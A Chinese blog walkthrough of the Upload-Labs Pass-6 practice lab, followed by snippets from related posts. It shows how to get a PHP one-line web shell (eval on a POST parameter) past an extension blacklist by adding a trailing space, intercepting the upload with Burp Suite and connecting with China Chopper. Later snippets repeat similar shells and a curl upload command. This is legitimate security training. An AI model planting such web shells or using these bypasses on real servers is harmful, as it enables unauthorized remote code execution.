Upload LABS Pass-6

已于 2025-03-02 18:40:54 修改
阅读量1.5w 收藏 1
点赞数 3
分类专栏: 《靶场实战》 文章标签: 安全 web安全 网络安全
于 2021-07-02 22:35:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wangyuxiang946/article/details/118424320
版权

 「作者简介」:冬奥会网络安全中国代表队,优快云 Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

第六关在后端用黑名单过滤文件后缀名,并过滤了大小写和点,但没过滤空格,我们抓包在后缀名中添加空格绕过。

准备一个 6.php 文件 , 内容为一句话木马

<?php eval($_POST[-7]);?>

上传 6.php 文件 , 并开启代理( 此处使用 Burp Suite )拦截请求

 

 在文件后缀中添加空格 , 然后转发请求

 后台校验文件后缀名时,由于后缀名多了一个空格,导致黑名单匹配不到,从而放行 , 文件传输至文件目录下的时候,系统会自动过滤后缀名的空格,使文件可以正常使用

右键 复制图片链接地址 , 并使用菜刀链接

链接成功

Upload-Labs-Pass-06
龙狼刺的博客
04-20 224
一、相知识 1、空格绕过原理: Windows系统下,对于文件名中的空格作为空处理,程序中的检测代码却不能自动删除空格,从而绕过黑名单。针对此情况,应修改对应的文件名,添加空格。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 三、文件上传 1、制作一句话木马 命令:<?php @eval($_POST['hacker']); ...
upload-labs Pass-15
wanggonghanfei的博客
10-23 259
根据源码分析,本卡任然可以使用图片制作的webshell。利用文件包含漏洞直接访问,详细步骤可以查看我。制作图片木马,然后直接上传,准备文件info.php。
Upload-labs文件上传漏洞(空格绕过)——Pass06
Zichel77的博客
07-27 1143
0×00 题目描述 似乎可以使用Pass04文件改写?但是感觉应该不会那么简单 0×01 源码分析 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".
upload-labs详解(1-12)文件上传分析
最新发布
weixin_73921499的博客
03-06 1177
upload-labs-env原版环境中,Apache的配置文件httpd.conf有将 .php3 .phtml解析成php文件。之后将文件上传文件index.jpg的文件内容移动到web.php中,这样恶意代码就可以被解析了。需要修改Apache的配置文件httpd.conf,使.php3 .phtml也可以被解析,发送到重放器,改包,将shell.jpg改为shell.php,重新发送,上传成功。时,路径变成了/upload/web.php 后面的连接字符都被丢弃了,文件的实际名称会变成。
upload-labs】————7、Pass-06
Fly_鹏程万里
08-15 404
界面 判断是前端检测还是后端检测: 之后查看源代码: 所有的文件后缀、大小写处理后过滤,但是对于后缀名却没有进行去除空格处理,这里可以通过在后缀名中加入空格绕过: 添加空格: 浏览器中访问: ...
upload-labs(Pass06-Pass10)
m0_46467017的博客
08-15 658
首先trim()删除文件名末尾的多个空格,然后deldot()删除文件名末尾的多个点,strrchr()以第一个.为界取出后缀,strtolower()将后缀转化为小写,str_ireplace()去掉后缀中的一个::$DATA,最后trim()删除后缀末尾的多个空格。处理完的后缀与黑名单对比,如果后缀不在黑名单中,则上传后的文件名是去掉文件名末尾的空格,再去掉文件名末尾的点之后的文件名。按照这个顺序倒推,就可以发现后缀.php. .(点空格点)是可以绕过黑名单检查的。发现本的代码与之前的代码少了。...
upload-labs:pass-06
羽的博客
07-09 271
第六和第三对比一下,找不同。 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp...
[网络安全]upload-labs Pass-18 解题详析_upload-labs18条件竞争
2401_84972676的博客
05-13 552
创建一个允许上传的文件扩展名数组$ext_arr,包括了允许上传的图片类型(jpg、png、gif)。根据定义的上传路径UPLOAD_PATH和文件名生成待存储的文件路径$upload_file。在移动成功的情况下,使用in_array函数检查文件扩展名是否在允许上传的类型数组中。如果文件扩展名不在允许上传的类型数组中,记录错误信息$msg,并删除已上传的文件。如果有,则开始处理文件上传。如果文件扩展名在允许上传的类型数组中,生成一个随机的文件名。msg为空,来初始化文件上传的状态和错误信息。
upload-labs-writeup-master.zip
10-25
【标题】"upload-labs-writeup-master.zip" 涉及的是一个于上传漏洞实验室的环境搭建资源。这个压缩包包含了一个完整的实验环境,目的是帮助用户理解和学习如何防范和检测Web应用中的上传漏洞。 【描述】中提到,...
[网络安全]upload-labs Pass-20 解题详析(1)
2401_84972726的博客
05-13 482
} ?>上传一个到服务器。请选择要上传的图片: 保存名称:
[网络安全]upload-labs Pass-14 解题详析_upload-labs-linux pass14(1)
2401_84972580的博客
05-13 448
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
upload-labs 上传训练
09-02
转自GitHub,是一个文件上传演练的靶场,练习文件上传思路轻松加愉快,附带源码查看,以及提示
文件上传漏洞靶场upload-labs学习(pass6-pass10)
AFCC_的博客(Web_Dog)
03-06 3267
0X00 Pass66从后缀绕过的角度考察,源码为: $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3"
upload-labs pass06-12
hclimg的博客
07-31 449
pass-06: 查看提示: 还是黑名单限制,通过查看源代码,知道删除了文件名后面的., 但是并没有删除空格,所以通过上传一个后缀名再添加一个空格的文件去绕过黑名单,windoes在创建文件时会自动删掉最后的空格。 上传成功,访问图片链接 成功!!! pass-07: 查看提示: 查看源代码可知,服务器端把文件名后面的空格给删除了 Windows有个特性,就是如果文件名后缀以.或者空格结尾...
[网络安全]upload-labs Pass-06 解题详析
等风来
08-14 5677
由于PHPStudy中apache 2.4.39连接报错,可切换为nginx 1.15.11。本并未使用strtolower函数对文件名进行大小写过滤,故可抓包进行大小写绕过。接着打开图片链接可得到文件上传URL。将.php改为.Php。
UPLOAD LABS | PASS 06 - 黑名单绕过(Windows 大小写绕过)
Blue17 の 小窝
11-30 415
所以,本我们就可以通过修改文件扩展名的大小写从而进行绕过。如果对方的服务器是 Linux 操作系统的话,就不行了,对于 Linux 操作系统而言,Win32,证明是 Windows 操作系统,在 Windows 操作系统中,下面是本 WAF 源码,采用的是黑名单校验的方式,其在第五的基础上过滤了。被认为是同一个文件,即它不会识别文件的大小写(也说明,我们传入的。通过查看源码,可以发现,本在第五的基础上过滤了后缀为。下面,我们尝试利用对方服务器的漏洞,上传。
当黑客就入门 upload-labs pass6-10
Tuye的博客
07-27 573
pass6 pass7 pass8 pass9 pass10
upload-labs(Pass-06 ~ Pass-09)
m0_64849639的博客
08-15 511
upload-labs
文件上传漏洞upload-libs pass6
CMACCKK
02-18 285
文件上传漏洞upload-libs pass6 还是先来查看一下源代码 看一下过滤规则 相比于pass5去掉了改为小写的代码 所以我们可以使用大小写绕过 把test.php 改为 test.PhP 或PHp等 注意pHp在黑名单中 ...
upload-labspass-12
01-24
### Upload-Labs Pass-12 的解法 #### 背景介绍 Upload-Labs 是一个基于 PHP 编写的靶场项目,用于练习和学习文件上传漏洞的相技巧。Pass-12 主要涉及通过特定条件下的文件上传来实现攻击目标。 #### 文件类型检测机制分析 在第十二中,服务器端不仅会检查文件头信息还会验证 MIME 类型以及文件扩展名。为了成功绕过这些限制并完成挑战,可以利用某些浏览器或工具发送自定义 HTTP 请求头部[^1]。 #### 利用方法 一种常见的策略是构造特殊格式的数据包,在请求体内的 `Content-Type` 字段指定合法的图片MIME类型(如 image/jpeg),而实际提交的内容则为恶意脚本代码。由于服务端仅依赖客户端声明的信息来进行初步判断,因此这种方法可以在一定程度上规避基本的安全过滤[^2]。 另外需要注意的是,尽管该题目可能允许上传带有 .php 扩展名以外其他类型的文件,但在最终保存到磁盘之前通常会被重命名为随机字符串加上固定的后缀形式存储。所以即使能够上传 php 文件也需要考虑如何触发执行[^3]。 ```bash curl -X POST \ http://target_url/index.php?case=12&action=upload \ -H 'content-type: multipart/form-data;' \ -F "file=@/path/to/malicious_file.jpg;filename=image.jpg" ``` 此命令展示了如何使用 curl 工具向目标 URL 发送包含伪造 Content-Type 头部字段的POST请求,并附带一个名为image.jpg的实际载荷文件路径。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值